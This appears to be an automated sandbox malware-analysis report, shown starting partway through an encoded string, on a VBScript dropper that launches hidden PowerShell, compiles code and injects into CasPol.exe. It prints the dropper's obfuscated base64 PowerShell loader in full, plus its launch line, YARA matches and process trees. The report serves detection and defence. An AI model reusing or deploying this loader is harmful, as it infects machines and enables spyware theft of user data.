AbgByAE4AbwAsAEIAcgBpAG0AYQBuAEkAbgB0AEQAYQAgAEEAdQBDAFIAaQByAFAAcgBvAEgAYQBjAEgAZQBrAHMAawAsAGEAawBpAFIAdQBuAEgAeQB0AE0AZQAgAE0AYQBBAFAAaAB1AE4AYQB0AFkAbwBvAEEAcwBzAFMAZAAsAEcAdQBpAEEAZgBuAEEAcAB0AFMAawAgAFUAbgBSAFAAbABlAEEAZgB0AFMAawByAFcAcgApAE8AcAA7AAoARwBsAFsAVABhAEQAVABlAGwASABvAGwAQQBuAEkARABvAG0AUwBuAHAATgBvAG8AYQB1AHIAUwBrAHQATwBjACgARwBsACIATABpAHcASAB5AGkAUwBhAG4ATwBiAG0AYQBjAG0AQgBhAC4AUwBtAGQAcABoAGwATwBuAGwAUABhACIAYQBsACkARQB4AF0AQQByAHAATQBvAHUAUwBpAGIAQQBhAGwAVABlAGkARABpAGMAUgBpACAAUwB0AHMARABlAHQATQBlAGEAQwB1AHQAQgBlAGkAVABoAGMATABhACAAQwBvAGUARABhAHgARQByAHQAdABvAGUAVABhAHIAQQBtAG4AUgB1ACAAQQByAGkARwByAG4ARwByAHQATABvACAAaABlAEcATABlAGUAVABhAHQAQQBxAEQARQBrAHIATQB5AGkARABvAHYAagBvAGUASABvAHIATA Jump to behavior
Potential malicious VBS script found (suspicious strings)
Source: Initial file: Strygeorke.ShellExecute Flogste, "-NoExit -E" & Sammentr(110) & Sammentr(99) & "oded" & "Command " & chr(34) & Ambulating58 & chr(34), "", "", 0
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 13732
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 13732 Jump to behavior
Yara signature match
Source: 0000001A.00000000.1970106356.0000000001350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000014.00000002.2220743788.0000000009E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000014.00000002.2103587544.0000000004C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000014.00000002.2099293106.0000000003010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000014.00000002.2096104717.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000014.00000003.1512001892.0000000002F62000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000014.00000003.1609777781.00000000086AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000014.00000002.2094575687.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000014.00000002.2098442263.0000000002F6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000014.00000002.2100345664.0000000003290000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000014.00000003.1523532169.0000000002F6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000014.00000002.2105674011.0000000005081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: Process Memory Space: powershell.exe PID: 9092, type: MEMORYSTR Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: Process Memory Space: CasPol.exe PID: 6564, type: MEMORYSTR Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Detected potential crypto function
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_08506D00 20_2_08506D00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_0850E468 20_2_0850E468
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_0850E458 20_2_0850E458
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_088C53C8 20_2_088C53C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_088C2AC8 20_2_088C2AC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_088C2AD8 20_2_088C2AD8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_088E91A8 20_2_088E91A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_088EB1A0 20_2_088EB1A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_088EA960 20_2_088EA960
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_088E6A60 20_2_088E6A60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_088E73A8 20_2_088E73A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_088E9BC8 20_2_088E9BC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_088E64F8 20_2_088E64F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_088E25E8 20_2_088E25E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_088E5758 20_2_088E5758
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_08950006 20_2_08950006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_08950040 20_2_08950040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_089552B0 20_2_089552B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_089552C0 20_2_089552C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_08B6E940 20_2_08B6E940
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_08B6D6E8 20_2_08B6D6E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_08C69118 20_2_08C69118
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_08C6AA00 20_2_08C6AA00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_08D12C07 20_2_08D12C07
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_08D10F33 20_2_08D10F33
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_08D128C0 20_2_08D128C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 26_2_1DAD7020 26_2_1DAD7020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 26_2_1DADA220 26_2_1DADA220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 26_2_1DAD9950 26_2_1DAD9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 26_2_1DAD9608 26_2_1DAD9608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 26_2_20B03405 26_2_20B03405
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 26_2_20B0E6D0 26_2_20B0E6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 26_2_20B05626 26_2_20B05626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 26_2_20B0AE49 26_2_20B0AE49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 26_2_20B094B1 26_2_20B094B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 26_2_20B0567F 26_2_20B0567F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 26_2_20B01E48 26_2_20B01E48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 26_2_20C2007B 26_2_20C2007B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 26_2_20C24AD8 26_2_20C24AD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 26_2_20C2BE28 26_2_20C2BE28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 26_2_20C2D390 26_2_20C2D390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 26_2_20C22F60 26_2_20C22F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 26_2_20C2BC3B 26_2_20C2BC3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 26_2_20C291E8 26_2_20C291E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 26_2_20C29588 26_2_20C29588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 26_2_20C25280 26_2_20C25280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 26_2_20C29E28 26_2_20C29E28
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 1DADD130 appears 54 times
Java / VBScript file with very long strings (likely obfuscated code)
Source: PUMP mt310143121.vbs Initial sample: Strings found which are bigger than 50
Tries to load missing DLLs
Source: C:\Windows\System32\wscript.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: edgegdi.dll Jump to behavior
Source: PUMP mt310143121.vbs Virustotal: Detection: 8%
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PUMP mt310143121.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "JABNAGkAbABqAHYAcgBuAGUAdABsACAAPQAgAEAAJwANAAoASQBtACQASABhAHUAUwB0AHYAQQBzAG8ARwByAHIARgBpADkAVABpACAAQgBpAD0AYQBmACAAQQBmACIAQQBmAFYARABpAGkAUgBlAHIAUwBwAHQAQQBmAHUATABvAGEAUgBlAGwASwBhAEEAUAB0AGwAQQBnAGwAUgBlAG8AUgBlAGMAUABoACIACgBTAHQAQQBLAG8AZABDAGgAZABMAHUALQBCAG8AVABJAGQAeQBsAGUAcABSAGkAZQBBAG4AIABlAHEALQBTAGsAVABOAGUAeQBVAG4AcABFAHMAZQBTAHQARABDAGEAZQBPAHAAZgBWAGUAaQBQAG8AbgBEAGUAaQBJAGQAdABTAHQAaQBBAHQAbwBOAG8AbgBLAGUAIABDAGgAQABWAGUAIgAKAHUAZAB1AEYAbwBzAFIAZQBpAEEAawBuAGEAZgBnAEEAcwAgAEwAZQBTAE8AcAB5AEMAeQBzAFMAZQB0AEQAaQBlAEEAbgBtAFAAcgA7AAoAdABpAHUARgBhAHMAQQBwAGkASQBuAG4AbwBwAGcASQBuACAAQgBhAFMATwBwAHkAQQBrAHMAVQBuAHQAVgBpAGUATQBlAG0AVgBlAC4AdgBlAFIAbwB2AHUAQwBvAG4AZQB4AHQAVABhAGkARABpAG0ATABhAGUAUwB0AC4AVgBlAEkAQgBpAG4ASwBvAHQARwBvAGUAQwBpAHIAQQBuAG8ARgBsAHAAWQBvAFMAVABoAGUAVQBuAHIAZQBpAHYAVQBkAGkARwBzAGMAUwBoAGUAUgBvAHMAUABsADsACgBPAHAAcABTAHkAdQBSAGEAYgBGAGEAbABNAGEAaQBXAGkAYwB1AG4AIABBAHUAcwBJAG4AdABQAG8AYQBVAHAAdABTAGEAaQBHAHIAYwBEAG8AIABzAGsAYwByAGkAbABNAGkAYQBXAG8AcwBGAHIAcwBpAG4AIABTAHQAQwBHAGkAbABWAG8AYQBTAHUAZABJAG4AbwBNAHkAZwBHAHQAZQBTAHQAbgBBAHIAZQBGAGEAdABMAG8AMQAKAFMAcAB7AEEAcwBbAEcAbgBEAGIAZQBsAFUAbgBsAEIAdQBJAEYAeQBtAEQAbwBwAEYAYQBvAFYAZQByAFQAcgB0AFUAbgAoAFAAaAAiAEsAZQB1AFUAaQBzAFMAdQBlAFAAcwByAEYAbgAzAEEAcAAyAHMAawAiAHQAcgApAEcAcgBdAEUAbgBwAFAAaQB1AE8AcABiAFMAdABsAHMAYQBpAFMAcABjAFYAaQAgAFMAdQBzAFAAbwB0AEgAYQBhAFMAawB0AEIAZQBpAFMAYwBjAFUAbgAgAEQAaQBlAEUAcgB4AFAAdQB0AFMAdgBlAEEAcgByAFcAYQBuAEkAbgAgAEcAZwBpAFAAZQBuAE0AYQB0AFUAbgAgAHQAcgBDAFAAaQByAEEAYQBlAEQAZQBhAFMAbAB0AFMAdABlAEsAbABNAEIAdQBEAFAAbABJAGkAbgBXAFUAbgBpAEUAbABuAHMAdABkAFIAZQBvAFYAYQB3AE0AYQAoAEwAYQBpAEEAbgBuAFMAawB0AFMAdAAgAEIAZQBOAEYAbAB2AFUAbgBoAEkAcgBpAEUAbQBlAEMAbwAsAEEAbgBpAEMAaABuAFAAcgB0AEQAaQAgAEYAbwBIAEwAYQBlAEsAbABhAEIAZQAsAGQAcgBpAFQAYQBuAEYAbwB0AEIAZQAgAFIAZQBoAFAAYQBhAEYAbwB0AGEAZgBjAEIAcgBoAFQAcgAsAEwAYQBpAEIAcgBuAEYAbwB0AFQAZQAgAFUAbgBQAFQAbwBpAEIAbwBuAE0AYQBpAEQAaQAsAE0AZQBpAE4AbwBuAEYAagB0AEMAaAAgAGQAdQBPAE0AYQB2AEgAZQBlAE8AcgByAFMAYQBpAFMAbAAsAEYAbwBpAE4AYQBuAHIAZQB0AE8AdgAgAFAAZQBSAHUAbgBlAEEAbgBjAE8AYgBpAE0AbwB0AEUAbABhAHAAYQAsAFIAZQBpAFMAYQBuAEMAYQB0AEgAYQAgAFAAcgBPAEcAbwBwAEEAdQBrAFMAbgByAE4AbwAsAEIAcgBpAG0AYQBuAEkAbgB0AEQAYQAgAEEAdQBDAFIAaQByAFAAcgBvAEgAYQBjAEgAZQBrAHMAawAsAGEAawBpAFIAdQBuAEgAeQB0AE0AZQAgAE0AYQBBAFAAaAB1AE4AYQB0AFkAbwBvAEEAcwBzAFMAZAAsAEcAdQBpAEEAZgBuAEEAcAB0AFMAawAgAFUAbgBSAFAAbABlAEEAZgB0AFMAawByAFcAcgApAE8AcAA7AAoARwBsAFsAVABhAEQAVABlAGwASABvAGwAQQBuAEkARABvAG0AUwBuAHAATgBvAG8AYQB1AHIAUwBrAHQATwBjACgARwBsACIATABpAHcASAB5AGkAUwBhAG4ATwBiAG0AYQBjAG0AQgBhAC4AUwBtAGQAcABoAGwATwBuAGwAUABhACIAYQBsACkARQB4AF0AQQByAHAATQBvAHUAUwBpAGIAQQBhAGwAVABlAGkARABpAGMAUgBpACAAUwB0AHMARABlAHQATQBlAGEAQwB1AHQAQgBlAGkAVABoAGMATABhACAAQwBvAGUARABhAHgARQByAHQAdABvAGUAVABhAHIAQQBtAG4AUgB1ACAAQQByAGkARwByAG4ARwByAHQATABvACAAaABlAEcATABlAGUAVABhAHQAQQBxAEQARQBrAHIATQB5AGkARABvAHYAagBvAGUASABvAHIATA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA2B2.tmp" "c:\Users\user\AppData\Local\Temp\sepi5xx1\CSC7F7A267C826A46D5AA3589EC91649B9.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "JABNAGkAbABqAHYAcgBuAGUAdABsACAAPQAgAEAAJwANAAoASQBtACQASABhAHUAUwB0AHYAQQBzAG8ARwByAHIARgBpADkAVABpACAAQgBpAD0AYQBmACAAQQBmACIAQQBmAFYARABpAGkAUgBlAHIAUwBwAHQAQQBmAHUATABvAGEAUgBlAGwASwBhAEEAUAB0AGwAQQBnAGwAUgBlAG8AUgBlAGMAUABoACIACgBTAHQAQQBLAG8AZABDAGgAZABMAHUALQBCAG8AVABJAGQAeQBsAGUAcABSAGkAZQBBAG4AIABlAHEALQBTAGsAVABOAGUAeQBVAG4AcABFAHMAZQBTAHQARABDAGEAZQBPAHAAZgBWAGUAaQBQAG8AbgBEAGUAaQBJAGQAdABTAHQAaQBBAHQAbwBOAG8AbgBLAGUAIABDAGgAQABWAGUAIgAKAHUAZAB1AEYAbwBzAFIAZQBpAEEAawBuAGEAZgBnAEEAcwAgAEwAZQBTAE8AcAB5AEMAeQBzAFMAZQB0AEQAaQBlAEEAbgBtAFAAcgA7AAoAdABpAHUARgBhAHMAQQBwAGkASQBuAG4AbwBwAGcASQBuACAAQgBhAFMATwBwAHkAQQBrAHMAVQBuAHQAVgBpAGUATQBlAG0AVgBlAC4AdgBlAFIAbwB2AHUAQwBvAG4AZQB4AHQAVABhAGkARABpAG0ATABhAGUAUwB0AC4AVgBlAEkAQgBpAG4ASwBvAHQARwBvAGUAQwBpAHIAQQBuAG8ARgBsAHAAWQBvAFMAVABoAGUAVQBuAHIAZQBpAHYAVQBkAGkARwBzAGMAUwBoAGUAUgBvAHMAUABsADsACgBPAHAAcABTAHkAdQBSAGEAYgBGAGEAbABNAGEAaQBXAGkAYwB1AG4AIABBAHUAcwBJAG4AdABQAG8AYQBVAHAAdABTAGEAaQBHAHIAYwBEAG8AIABzAGsAYwByAGkAbABNAGkAYQBXAG8AcwBGAHIAcwBpAG4AIABTAHQAQwBHAGkAbABWAG8AYQBTAHUAZABJAG4AbwBNAHkAZwBHAHQAZQBTAHQAbgBBAHIAZQBGAGEAdABMAG8AMQAKAFMAcAB7AEEAcwBbAEcAbgBEAGIAZQBsAFUAbgBsAEIAdQBJAEYAeQBtAEQAbwBwAEYAYQBvAFYAZQByAFQAcgB0AFUAbgAoAFAAaAAiAEsAZQB1AFUAaQBzAFMAdQBlAFAAcwByAEYAbgAzAEEAcAAyAHMAawAiAHQAcgApAEcAcgBdAEUAbgBwAFAAaQB1AE8AcABiAFMAdABsAHMAYQBpAFMAcABjAFYAaQAgAFMAdQBzAFAAbwB0AEgAYQBhAFMAawB0AEIAZQBpAFMAYwBjAFUAbgAgAEQAaQBlAEUAcgB4AFAAdQB0AFMAdgBlAEEAcgByAFcAYQBuAEkAbgAgAEcAZwBpAFAAZQBuAE0AYQB0AFUAbgAgAHQAcgBDAFAAaQByAEEAYQBlAEQAZQBhAFMAbAB0AFMAdABlAEsAbABNAEIAdQBEAFAAbABJAGkAbgBXAFUAbgBpAEUAbABuAHMAdABkAFIAZQBvAFYAYQB3AE0AYQAoAEwAYQBpAEEAbgBuAFMAawB0AFMAdAAgAEIAZQBOAEYAbAB2AFUAbgBoAEkAcgBpAEUAbQBlAEMAbwAsAEEAbgBpAEMAaABuAFAAcgB0AEQAaQAgAEYAbwBIAEwAYQBlAEsAbABhAEIAZQAsAGQAcgBpAFQAYQBuAEYAbwB0AEIAZQAgAFIAZQBoAFAAYQBhAEYAbwB0AGEAZgBjAEIAcgBoAFQAcgAsAEwAYQBpAEIAcgBuAEYAbwB0AFQAZQAgAFUAbgBQAFQAbwBpAEIAbwBuAE0AYQBpAEQAaQAsAE0AZQBpAE4AbwBuAEYAagB0AEMAaAAgAGQAdQBPAE0AYQB2AEgAZQBlAE8AcgByAFMAYQBpAFMAbAAsAEYAbwBpAE4AYQBuAHIAZQB0AE8AdgAgAFAAZQBSAHUAbgBlAEEAbgBjAE8AYgBpAE0AbwB0AEUAbABhAHAAYQAsAFIAZQBpAFMAYQBuAEMAYQB0AEgAYQAgAFAAcgBPAEcAbwBwAEEAdQBrAFMAbgByAE4AbwAsAEIAcgBpAG0AYQBuAEkAbgB0AEQAYQAgAEEAdQBDAFIAaQByAFAAcgBvAEgAYQBjAEgAZQBrAHMAawAsAGEAawBpAFIAdQBuAEgAeQB0AE0AZQAgAE0AYQBBAFAAaAB1AE4AYQB0AFkAbwBvAEEAcwBzAFMAZAAsAEcAdQBpAEEAZgBuAEEAcAB0AFMAawAgAFUAbgBSAFAAbABlAEEAZgB0AFMAawByAFcAcgApAE8AcAA7AAoARwBsAFsAVABhAEQAVABlAGwASABvAGwAQQBuAEkARABvAG0AUwBuAHAATgBvAG8AYQB1AHIAUwBrAHQATwBjACgARwBsACIATABpAHcASAB5AGkAUwBhAG4ATwBiAG0AYQBjAG0AQgBhAC4AUwBtAGQAcABoAGwATwBuAGwAUABhACIAYQBsACkARQB4AF0AQQByAHAATQBvAHUAUwBpAGIAQQBhAGwAVABlAGkARABpAGMAUgBpACAAUwB0AHMARABlAHQATQBlAGEAQwB1AHQAQgBlAGkAVABoAGMATABhACAAQwBvAGUARABhAHgARQByAHQAdABvAGUAVABhAHIAQQBtAG4AUgB1ACAAQQByAGkARwByAG4ARwByAHQATABvACAAaABlAEcATABlAGUAVABhAHQAQQBxAEQARQBrAHIATQB5AGkARABvAHYAagBvAGUASABvAHIATA Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.cmdline Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA2B2.tmp" "c:\Users\user\AppData\Local\Temp\sepi5xx1\CSC7F7A267C826A46D5AA3589EC91649B9.TMP" Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fo0nlcmw.oxc.ps1 Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBS@12/12@3/3
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9100:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9100:120:WilError_03
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PUMP mt310143121.vbs"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
